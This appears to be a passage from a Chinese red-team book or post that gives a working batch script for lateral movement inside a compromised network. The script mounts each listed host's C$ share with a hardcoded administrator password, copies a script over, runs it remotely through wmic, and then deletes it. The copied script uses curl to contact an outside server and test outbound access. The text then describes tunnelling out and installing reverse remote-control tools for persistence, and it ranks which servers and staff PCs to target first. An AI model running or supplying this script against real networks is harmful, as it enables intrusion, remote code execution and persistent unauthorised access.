最新批量探测出内网机器脚本

逐台寻找出网计算机效率太低，所以需要能够批量探测能够出网的计算机的方法。例如，当我们拥有了一定的内网权限后，可以直接运行批处理脚本通过依次net use连接多台计算机的方式来进行批量探测，这里给出一个能够实现该功能的批处理脚本。

@echo off
for /f "delims=" %%i in (host.txt) do @(
echo.
echo %%i Rce Begining ...
net use \\%%i\c$ /user:"administrator" "admin!@#45" > null
copy NetInfo.bat \\%%i\c$\users\public\ /y > null
echo.
wmic /node:%%i /user:".\administrator" /password:"admin!@#45" PROCESS call create "cmd /c c:/users/public/netinfo.bat"
ping 127.0.0.1 -n 42 > null
echo.
echo.
del \\%%i\c$\users\public\NetInfo.bat /F
net use \\%%i\c$ /del  > nul
)

简单说明一下该批处理脚本中的部分参数：

1．第2行括号内的host.txt文本文件，要和批处理脚本放在同一目录下，它包含的是我们计划要进行批量探测的计算机IP地址，比如：

192.168.0.2
192.168.0.3
192.168.0.4
……

2．第5行和第8行中，参数administrator是我们所拥有的较高权限的用户账户，admin!@#45是该用户账户的密码。

3．第6行、9行、13行所提到的NetInfo.bat，是被自动拷贝到远程计算机上执行的脚本，用来探测远程计算机能否通过指定协议连接互联网，我们可以结合本书第3.2和3.4节的内容，根据实际情况编写脚本。举个例子，假设探测的是HTTP协议能否出网，我们利用Windows10自带的curl工具，编写NetInfo.bat内容如下：

curl -k -vv -m 10 https://ServerIP

脚本运行完成后，我们查阅一下被访问的服务器的web日志，就可以确定能够构建出网通信隧道的计算机了。

攻击者进入内网后，经常遇到所控制的计算机不能构建出网隧道的情况，一般会考虑横向突破内网的其他计算机，直到找到能够构建出网通信隧道的计算机，然后再安装反向远控软件进行深入分析以及权限维持。

下面列出常见的能构建出网通信隧道的计算机，当然我们并不确定这些计算机肯定能出网，只是建议大家优先对这些计算机进行测试。

• 1. 代理服务器(Proxy)
• 2. 反病毒服务器(AV/杀软名称/AntiVirus)
• 3. 更新服务器(WSUS/Update)
• 4. 邮件服务器(Exchange/Mail/OWA)
• 5. 防火墙服务器(ISA/TMG/FW/Firewall)
• 6. DHCP服务器
• 7. SCCM服务器
• 8. 内网管理员个人计算机
• 9. 部门领导的个人计算机